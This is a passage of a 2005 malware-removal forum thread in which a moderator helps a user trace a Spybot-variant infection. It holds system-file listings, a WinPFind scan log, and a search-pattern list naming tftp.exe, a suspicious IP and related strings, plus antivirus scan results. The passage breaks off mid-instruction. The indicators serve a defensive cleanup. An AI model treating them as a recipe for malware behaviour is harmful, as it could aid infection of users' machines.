adsnds.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
adsnt.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
adsnw.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
advapi32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
advpack.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ahui.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
alg.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
alrsvc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
amstream.dll 12/12/2002 2:5.x Signed dxxp.CAT Microsoft Windows Component Publisher
ansi.sys 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
apcups.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
append.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
apphelp.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
appmgmts.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
appmgr.dll 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
appwiz.cpl 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
arp.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
asctrls.ocx 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
asferror.dll 9/22/2004 2:5.1 Signed wmp10.CAT Microsoft Windows Component Publisher
asfsipc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
asr_fmt.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
asr_ldm.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
asycfilt.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
at.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ati2dvaa.dll 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ati2dvag.dll 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ati3d1ag.dll 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ati3d2ag.dll 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ativdaxx.ax 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ativmvxx.ax 8/29/2002 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
atkctrs.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
atl.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
atmadm.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
atmfd.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
atmlib.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
atmpvcno.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
atrace.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
attrib.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
audiosrv.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
authz.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
autochk.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
autoconv.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
autodisc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
autofmt.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
autolfn.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
avicap32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
avifil32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
avmeter.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
avtapi.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
avwav.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
basesrv.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
batmeter.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
batt.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
bdaplgin.ax 7/9/2004 2:5.x Signed dxbda.CAT Microsoft Windows Component Publisher
bidispl.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
blackbox.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
bootcfg.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
bootok.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
bootvid.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
bootvrfy.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
browselc.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
browser.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
browseui.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
browsewm.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cabinet.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cabview.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cacls.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
calc.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
camocx.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
capesnpn.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cards.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
catsrv.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
catsrvps.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
catsrvut.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ccfgnt.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cdfview.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cdm.dll 8/3/2004 None Signed N/A Microsoft Windows XP Publisher
cdmodem.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cdosys.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
certcli.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
certmgr.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cewmdm.dll 1/28/2005 2:5.1 Signed wmdm10.CAT Microsoft Windows Component Publisher
cfgbkend.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cfgmgr32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
charmap.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
chkdsk.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
chkntfs.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ciadmin.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cic.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cidaemon.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ciodm.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cipher.exe 3/31/2003 2:5.1 Signed NT5INF.CAT Microsoft Windows Publisher
cisvc.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
ckcnv.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
clb.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
clbcatex.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
clbcatq.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cleanmgr.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
clipbrd.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
clipsrv.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
clusapi.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cmcfg32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cmd.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cmdial32.dll 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cmdl32.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publisher
cmmon32.exe 3/31/2003 2:5.1 Signed NT5.CAT Microsoft Windows XP Publish
  • 0

#129
Metallica
Posted 11 August 2005 - 03:29 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
It looks as if we managed to stop the infections of inviting their friends over, but there is still something going on.

Let's try and backtrace it.

Can you do a find files for files containing the text toruncity

Repeat the procedure for 64.94.136.5

Let me know if and what you find.
I'm hoping for some .ini files in the system32 folder.

Regards,
  • 0

#130
duglartis
Posted 12 August 2005 - 03:09 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hi there
couldnt find anything in the search
have had this beast trying to start several times
Fri 12 - 20:42:50 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
thanks for your help
  • 0

Advertisements

#131
Metallica
Posted 12 August 2005 - 04:02 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
In the WinPFind folder you will find a file called patterns.txt

Can you edit the content to look like this:

tftp.exe
64.94.136.5
toruncity
socket64.dll


Save it. reboot into safe mode and run WinPfind.exe
Post the log please.

Regards,
  • 0

#132
duglartis
Posted 13 August 2005 - 04:50 PM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello here is the logfile
WARNING: not all files found by this scanner are bad. Consult with a knowledgable person before proceeding.

If you see a message in the titlebar saying "not responding" you can ignore it. Windows is throwing this message up even though the program is still running. As long as the hard disk is working then the program is running.

»»»»»»»»»»»»»»»»»»»»»»»» Files found »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Checking %SystemDrive% folder...
UPX! 1/07/2005 20:08:38 5548 C:\pfind.txt
FSG! 1/07/2005 20:08:38 5548 C:\pfind.txt
aspack 1/07/2005 20:08:38 5548 C:\pfind.txt
PTech 1/07/2005 20:08:38 5548 C:\pfind.txt
UPX! 2/06/2004 08:00:34 50176 C:\VCLEANER.EXE

Checking %ProgramFilesDir% folder...

Checking %WinDir% folder...
FSG! 2/08/2005 21:39:00 267968512 C:\WINDOWS\MEMORY.DMP
PEC2 2/08/2005 21:39:00 267968512 C:\WINDOWS\MEMORY.DMP
qoologic 2/08/2005 21:39:00 267968512 C:\WINDOWS\MEMORY.DMP
aspack 2/08/2005 21:39:00 267968512 C:\WINDOWS\MEMORY.DMP

Checking %System% folder...
PEC2 19/07/1995 22:00:00 1371436 C:\WINDOWS\system32\VBAR2132.DLL
FSG! 21/07/2005 17:33:16 16896 C:\WINDOWS\system32\TFTP1124
PEC2 31/03/2003 12:00:00 41397 C:\WINDOWS\system32\dfrg.msc
winsync 31/03/2003 12:00:00 1309184 C:\WINDOWS\system32\wbdbase.deu
UPX! 29/10/2002 13:56:18 128000 C:\WINDOWS\system32\fmod.dll
Umonitor 31/03/2003 12:00:00 631808 C:\WINDOWS\system32\rasdlg.dll
aspack 20/02/2005 20:46:22 197120 C:\WINDOWS\system32\K2_SS_ver1.scr
PEC2 31/07/2005 22:00:54 102400 C:\WINDOWS\system32\winssh.exe

Checking %System%\Drivers folder and sub-folders...
UPX! 10/08/2005 17:23:16 668704 C:\WINDOWS\system32\drivers\avg7core.sys
FSG! 10/08/2005 17:23:16 668704 C:\WINDOWS\system32\drivers\avg7core.sys
aspack 10/08/2005 17:23:16 668704 C:\WINDOWS\system32\drivers\avg7core.sys

Checking the Windows folder for system and hidden files within the last 60 days...
8/08/2005 21:52:36 54156 QTFont.qfn
31/07/2005 09:56:44 749 WindowsShell.Manifest
31/07/2005 09:57:52 864256 ntuser.dat
31/07/2005 09:56:44 749 cdplayer.exe.manifest
31/07/2005 09:56:48 488 WindowsLogon.manifest
31/07/2005 09:56:44 749 ncpa.cpl.manifest
31/07/2005 09:56:44 749 nwc.cpl.manifest
31/07/2005 09:56:44 749 sapi.cpl.manifest
31/07/2005 09:56:44 749 wuaucpl.cpl.manifest
31/07/2005 09:56:48 488 logonui.exe.manifest
13/08/2005 13:31:30 798720 system.LOG
13/08/2005 13:31:30 151552 software.LOG
13/08/2005 13:31:30 8192 default.LOG
31/07/2005 09:57:56 1024 userdiff.LOG
31/07/2005 09:49:44 1024 TempKey.LOG
13/08/2005 13:32:34 1024 SAM.LOG
13/08/2005 13:32:26 12288 SECURITY.LOG
31/07/2005 09:57:56 1024 userdifr.LOG
31/07/2005 10:21:04 67 desktop.ini
31/07/2005 10:21:04 67 desktop.ini
31/07/2005 10:21:04 67 desktop.ini
31/07/2005 10:21:04 67 desktop.ini
31/07/2005 10:21:04 67 desktop.ini
20/07/2005 21:41:26 24 Preferred
20/07/2005 21:41:26 388 e61fb5b9-5597-4ce6-a6d0-06bc2571b417
31/07/2005 11:36:00 13698 filelist.xml
31/07/2005 09:57:18 67 desktop.ini
24/06/2005 21:08:48 331776 drmstore.hds
24/06/2005 21:08:48 30652 migration.log
31/07/2005 09:56:48 65 desktop.ini
31/07/2005 09:56:48 65 desktop.ini
13/08/2005 13:31:28 6 SA.DAT
3/07/2005 17:46:52 0 oem15.inf
3/07/2005 17:46:52 0 oem15.PNF
18/07/2005 20:03:40 0 oem16.inf
18/07/2005 20:03:40 0 oem16.PNF

»»»»»»»»»»»»»»»»»»»»»»»» Checking Startup Folders »»»»»»»»»»»»»»»»»»»»»

Checking files in %ALLUSERSPROFILE%\Startup folder...
19/10/2004 20:01:14 1493 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.lnk

Checking files in %ALLUSERSPROFILE%\Application Data folder...
16/11/2004 22:42:20 13 C:\Documents and Settings\All Users\Application Data\DirectCDUserNameG.txt

Checking files in %USERPROFILE%\Startup folder...

Checking files in %USERPROFILE%\Application Data folder...
17/09/2004 16:33:28 1441 C:\Documents and Settings\Dug And Tania\Application Data\DW.LOG
31/05/2005 19:33:02 91864 C:\Documents and Settings\Dug And Tania\Application Data\GDIPFONTCACHEV1.DAT

»»»»»»»»»»»»»»»»»»»»»»»» Registry Entries Found »»»»»»»»»»»»»»»»»»»»»»»

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\AVG Shell Extension
{1E2CDF40-419B-11D2-A5A1-002018648BA7} =
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\AVG7 Shell Extension
{9F97547E-4609-42C5-AE0C-81C61FFAEBC3} = C:\Program Files\Grisoft\AVG Free\avgse.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Offline Files
{750fdf0e-2a26-11d1-a3ea-080036587f03} = %SystemRoot%\System32\cscui.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With
{09799AFB-AD67-11d1-ABCD-00C04FC30936} = %SystemRoot%\system32\SHELL32.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Open With EncryptionMenu
{A470F8CF-A1E8-4f65-8335-227475AA5C46} = %SystemRoot%\system32\SHELL32.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\WinRAR
{B41DB860-8EE4-11D2-9906-E49FADC173CA} = C:\Program Files\WinRAR\rarext.dll
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\WinZip
{E0D79304-84BE-11CE-9641-444553540000} = C:\PROGRA~1\WINZIP\WZSHLSTB.DLL
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
Start Menu Pin = %SystemRoot%\system32\SHELL32.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\AVG Shell Extension
{1E2CDF40-419B-11D2-A5A1-002018648BA7} =
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\AVG7 Shell Extension
{9F97547E-4609-42C5-AE0C-81C61FFAEBC3} = C:\Program Files\Grisoft\AVG Free\avgse.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR
{B41DB860-8EE4-11D2-9906-E49FADC173CA} = C:\Program Files\WinRAR\rarext.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinZip
{E0D79304-84BE-11CE-9641-444553540000} = C:\PROGRA~1\WINZIP\WZSHLSTB.DLL

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{0D2E74C4-3C34-11d2-A27E-00C04FC30871}
= %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{24F14F01-7B1C-11d1-838f-0000F80461CF}
= %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{24F14F02-7B1C-11d1-838f-0000F80461CF}
= %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ColumnHandlers\{66742402-F9B9-11D1-A202-0000F81FEDEE}
= %SystemRoot%\system32\SHELL32.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HPDJ Taskbar Utility C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
AdaptecDirectCD C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
NeroCheck C:\WINDOWS\System32\\NeroCheck.exe
NvCplDaemon RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
KernelFaultCheck %systemroot%\system32\dumprep 0 -k
QuickTime Task "C:\Program Files\QuickTime\qttask.exe" -atboottime
AVG7_CC C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
AVG7_EMC C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
RegProt c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start
nwiz nwiz.exe /install
!1_pgaccount "C:\Program Files\ProcessGuard\pgaccount.exe"
TkBellExe "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents
IMAIL
MAPI
MSFS

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
NVIEW rundll32.exe nview.dll,nViewLoadHook
!1_ProcessGuard_Startup "C:\Program Files\ProcessGuard\procguard.exe" -minimize

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\{BDEADF00-C265-11D0-BCED-00A0C90AB50F}
= C:\PROGRA~1\COMMON~1\MICROS~1\WEBFOL~1\MSONSEXT.DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}
=
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\{0DF44EAA-FF21-4412-828E-260A8728E7F1}
=
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
dontdisplaylastusername 0
legalnoticecaption
legalnoticetext
shutdownwithoutlogon 1
undockwithoutlogon 1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
NoDriveTypeAutoRun 145
CDRAutoRun
LinkResolveIgnoreLinkInfo 1
NoStartBanner 1
NoWindowsUpdate 0
NoActiveDesktop 1
NoActiveDesktopChanges 1
NoCustomizeWebView 1
NoFavoritesMenu 1
NoInternetIcon 1
NoSetActiveDesktop 1
NoSettingsWizards 1
NoWebMenu 1
EditLevel 0
NoRun 0
NoClose 0
NoSaveSettings 0
NoFileMenu 0
SpecifyDefaultButtons 0
Btn_Search 0
NoBandCustomize 0
NoToolbarCustomize 0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
UserInit C:\WINDOWS\SYSTEM32\Userinit.exe,
Shell Explorer.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain
= crypt32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet
= cryptnet.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll
= cscdll.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp
= wlnotify.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule
= wlnotify.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy
= sclgntfy.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn
= WlNotify.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv
= wlnotify.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon
= wlnotify.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\PostBootReminder
{7849596a-48ea-486e-8937-a2a3009f31a9} = %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\CDBurn
{fbeb8a05-beee-4442-804e-409d6c4515e9} = %SystemRoot%\system32\SHELL32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\WebCheck
{E6FB5E20-DE35-11CF-9C87-00AA005127ED} = %SystemRoot%\System32\webcheck.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\SysTray
{35CEC8A3-2BE6-11D2-8773-92E220524153} = C:\WINDOWS\System32\stobject.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\UPnPMonitor
{e57ce738-33e8-4c51-8354-bb4de9d215d1} = C:\WINDOWS\System32\upnpui.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cqw32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\enc98.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\front.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mngreg32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\photohse.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\printhse.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prwin8.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ps80.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\psdmt.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qfinder.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qpw.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup32.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sevinst.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ua80.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wpwin8.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xwsetup.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Your Image File Name Here without a path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_INSTPGM.EXE

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
AppInit_DLLs

»»»»»»»»»»»»»»»»»»»»»»»» Scan Complete »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
WinPFind v1.0.0.15 - Log file written to "WinPFind.Txt" in the WinPFind folder.
thanks for your help
  • 0

#133
Metallica
Posted 14 August 2005 - 04:00 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Can you find this file for me?
C:\WINDOWS\system32\TFTP1124

Upload it at http://virusscan.jotti.org/
and let me know the results.

Regards,
  • 0

#134
duglartis
Posted 18 August 2005 - 12:12 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello here are the results looks like we are on to something

TFTP1124
Status:
INFECTED/MALWARE
MD5 249c463a9ae1b798316df699d51a044d
Packers detected:
PE_PATCH, FSG
Scanner results
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found W32/Spybot.QXW
UNA
Found nothing
VBA32
Found nothing
thanks for your help

Edited by duglartis, 18 August 2005 - 12:13 AM.

  • 0

#135
Metallica
Posted 18 August 2005 - 03:37 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Delete that file and click Start > Run >
